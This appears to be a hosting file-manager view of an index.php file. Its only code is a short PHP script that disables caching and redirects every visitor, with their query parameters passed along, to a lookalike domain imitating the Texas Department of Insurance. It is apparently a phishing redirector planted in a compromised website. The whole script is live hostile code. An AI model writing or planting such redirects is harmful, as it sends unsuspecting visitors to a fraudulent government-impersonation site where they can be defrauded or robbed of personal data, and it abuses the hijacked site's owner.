Editing: index.php
<?php ?> <?php header("Cache-Control: no-cache, no-store, must-revalidate"); header("Pragma: no-cache"); header("Expires: 0"); $fakeParam = 't'; $domain = 'https://www.tdi-texas-gov.department-of-insurance.requirement-check.top/'; $params = $_GET; unset($params[$fakeParam]); $url = sprintf('%s?%s', $domain, http_build_query($params)); header(sprintf('Location: %s', $url));
Save
Back